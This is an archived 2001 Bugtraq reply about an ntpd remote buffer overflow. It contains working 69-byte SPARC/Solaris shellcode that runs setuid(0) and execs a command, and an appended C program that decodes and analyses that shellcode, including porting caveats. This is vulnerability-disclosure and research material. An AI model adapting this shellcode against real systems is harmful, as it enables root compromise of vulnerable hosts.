[20071] in bugtraq

Re: ntpd =< 4.0.99k remote buffer overflow

daemon@ATHENA.MIT.EDU (Alexander Gall)
Fri Apr 6 16:43:06 2001

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <E14lUOe-0002dF-00@central.switch.ch>
Date:         Fri, 6 Apr 2001 13:27:20 +0200
Reply-To: Alexander Gall <gall@SWITCH.CH>
From: Alexander Gall <gall@SWITCH.CH>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  Your message of "Thu, 05 Apr 2001 15:30:42 BST." 
              <20010405153042.A3064@sherlock.clues.com>

> On Wed, Apr 04, 2001 at 06:49:01PM -0700, Crist Clark wrote:
> > Przemyslaw Frasunek wrote:
> > >
> > > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
> >
> > Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> > the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
> >
> > More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> > caused it to seg. fault and core. No time to double-check if that is actually
> > exploitable at this moment. How many NTP distributions are based off of the
> > vulnerable code? With the small payload, gaining access might be hard, but
> > the potential for DoS looks pretty easy.
>
> We've taken a peek at getting sparc shellcode working with this. Getting
> it in below the 70 byte buffer size is tricky.
>
> Does anybody out there have working shellcode for this that can do *anything*
> to the state of the system even if it doesn't lead to full sploit? (beyond
> making ntp core of course ;) )

Well, here is a shellcode that is 69 bytes long and execs
'/bin/touch /tmp/test' as root (if called from a setuid root program):

/* SPARC, Solaris syscall numbers: setuid = 23, exec = 11, trap via "ta 8" */
char shellcode[]=
"\x90\x10\x20\x00" /*           mov 0, %o0              */
"\x82\x10\x20\x17" /*           mov 23, %g1             */
"\x91\xd0\x20\x08" /*           ta 8 -> setuid(0)       */
"\x30\x80\x00\x07" /*           ba,a bounce             */
"\x90\x03\xe0\x08" /* start:    add %o7, 8, %o0         */
"\x92\x03\xa0\x40" /*           add %sp, 64, %o1        */
"\xd0\x22\x40\x00" /*           st %o0, [%o1]           */
"\xc0\x22\x60\x04" /*           st %g0, [%o1+4]         */
"\x82\x10\x20\x0b" /*           mov 11, %g1             */
"\x91\xd0\x20\x08" /*           ta 8 -> exec()          */
"\x7f\xff\xff\xfa" /* bounce:   call start              */
"\x01\x00\x00\x00" /*           nop                     */
"/bin/touch /tmp/test";

I don't know if you are aware of this, but simply replacing the shellcode in
the exploit won't work because of the differing layout of a stack frame on
SPARC.

I have also verified that xntpd 3.4y crashes on Solaris 8 with SIGSEGV.
However, when I looked at the core dump I had the impression that this is
*not* due to a buffer overflow because I couldn't find any of the symptoms
that I would expect in such a case (jump to never-never land because the
overwritten return address on the stack is garbage, %l and %i registers
filled with data from the buffer). I didn't look too hard though, so I may
be wrong.

Alex.

 ___________ SWITCH - The Swiss Academic and Research Network ___________
 Alexander Gall,  SWITCH,  Limmatquai 138,  CH-8001 Zurich,  Switzerland
 gall@switch.ch         Tel: +41 1 268 1522          Fax: +41 1 268 1568
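The control flow of the shellcode above (ba,a to bounce, call back to start, %o7+8 as the address of the command text, a two-entry argv built at %sp+64) can be checked without a SPARC box. The following is an added example, not part of the original post: a small decoder, written for this page, that handles only the SPARC v8 instruction encodings this shellcode uses, resolves every PC-relative target to a byte offset, and counts the embedded zero bytes. Function names are my own.

```c
/* Decode the SPARC v8 shellcode from the post and resolve its PC-relative
 * targets on any host. Added example, not part of the original post; the
 * decoder handles only the instruction encodings this shellcode uses. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The shellcode exactly as posted (sizeof == 69 with the C terminator). */
static const unsigned char shellcode[] =
    "\x90\x10\x20\x00" "\x82\x10\x20\x17" "\x91\xd0\x20\x08" "\x30\x80\x00\x07"
    "\x90\x03\xe0\x08" "\x92\x03\xa0\x40" "\xd0\x22\x40\x00" "\xc0\x22\x60\x04"
    "\x82\x10\x20\x0b" "\x91\xd0\x20\x08" "\x7f\xff\xff\xfa" "\x01\x00\x00\x00"
    "/bin/touch /tmp/test";

#define NWORDS 12   /* instruction words before the command text */

/* SPARC is big-endian: build the 32-bit instruction word at byte `off`. */
static uint32_t word_at(size_t off) {
    const unsigned char *p = shellcode + off;
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | p[3];
}

/* Sign-extend the low `bits` bits of v (disp30, disp22, simm13). */
static int32_t sext(uint32_t v, int bits) {
    uint32_t m = 1u << (bits - 1);
    return (int32_t)((v & ((1u << bits) - 1)) ^ m) - (int32_t)m;
}

/* %g0-7, %o0-7, %l0-7, %i0-7 */
static const char *regname(unsigned r, char *buf) {
    snprintf(buf, 8, "%%%c%u", "goli"[r >> 3], r & 7);
    return buf;
}

/* If the word at `off` is a call (format 1) or a Bicc (format 2), store its
 * target as a byte offset from the start of the shellcode and return 1. */
int pc_relative_target(size_t off, long *target) {
    uint32_t w = word_at(off);
    if ((w >> 30) == 1) {                          /* call disp30 */
        *target = (long)off + 4L * sext(w, 30);
        return 1;
    }
    if ((w >> 30) == 0 && ((w >> 22) & 7) == 2) {  /* Bicc disp22 */
        *target = (long)off + 4L * sext(w, 22);
        return 1;
    }
    return 0;
}

/* Render the word at `off` in the notation of the post's own comments. */
const char *describe(size_t off, char *buf, size_t n) {
    uint32_t w = word_at(off);
    unsigned op = w >> 30, rd = (w >> 25) & 31, op3 = (w >> 19) & 63;
    unsigned rs1 = (w >> 14) & 31, i = (w >> 13) & 1, rs2 = w & 31;
    unsigned cond = (w >> 25) & 15, annul = (w >> 29) & 1;
    int32_t simm = sext(w, 13);
    char a[8], b[8];
    long t;

    if (w == 0x01000000)                                   /* sethi 0, %g0 */
        snprintf(buf, n, "nop");
    else if (pc_relative_target(off, &t))
        snprintf(buf, n, "%s %ld", op == 1 ? "call" :
                 cond == 8 ? (annul ? "ba,a" : "ba") : "b?", t);
    else if (op == 2 && op3 == 0x3a && cond == 8)          /* trap always */
        snprintf(buf, n, "ta %u", (unsigned)(w & 0x7f));
    else if (op == 2 && op3 == 2 && rs1 == 0 && i)         /* or %g0,imm,rd */
        snprintf(buf, n, "mov %d, %s", simm, regname(rd, a));
    else if (op == 2 && op3 == 0 && i)                     /* add rs1,imm,rd */
        snprintf(buf, n, "add %s, %d, %s", regname(rs1, a), simm, regname(rd, b));
    else if (op == 3 && op3 == 4 && !i && rs2 == 0)        /* st rd,[rs1] */
        snprintf(buf, n, "st %s, [%s]", regname(rd, a), regname(rs1, b));
    else if (op == 3 && op3 == 4 && i)                     /* st rd,[rs1+imm] */
        snprintf(buf, n, "st %s, [%s+%d]", regname(rd, a), regname(rs1, b), simm);
    else
        snprintf(buf, n, ".word 0x%08x", (unsigned)w);
    return buf;
}

/* `call` leaves its own address in %o7, so "add %o7, 8, %o0" points %o0 two
 * words past the call: over the delay-slot nop, at the command text. */
long command_string_offset(void) {
    for (size_t off = 0; off < NWORDS * 4; off += 4)
        if ((word_at(off) >> 30) == 1)
            return (long)off + 8;
    return -1;
}

/* Zero bytes in the 68 payload bytes: the code is not NUL-free, so it only
 * survives a length-based copy, not a strcpy-style one. */
size_t nul_byte_count(void) {
    size_t n = 0;
    for (size_t k = 0; k + 1 < sizeof shellcode; k++)
        n += shellcode[k] == 0;
    return n;
}

int main(void) {
    char buf[48];
    long t;
    for (size_t off = 0; off < NWORDS * 4; off += 4) {
        printf("%2zu: %08x  %-20s", off, (unsigned)word_at(off),
               describe(off, buf, sizeof buf));
        if (pc_relative_target(off, &t)) printf("-> offset %ld", t);
        putchar('\n');
    }
    printf("command text at %ld: \"%s\", NUL bytes in code: %zu\n",
           command_string_offset(),
           (const char *)shellcode + command_string_offset(), nul_byte_count());
    return 0;
}
```

The listing reproduces the post's comments word for word (the decoder prints %sp as %o6), shows the ba,a at offset 12 landing on the call at 40 and the call returning to offset 16, and puts the command text at offset 48. The NUL count is the caveat to keep in mind when moving this payload to a different overflow: six of the 68 bytes are zero.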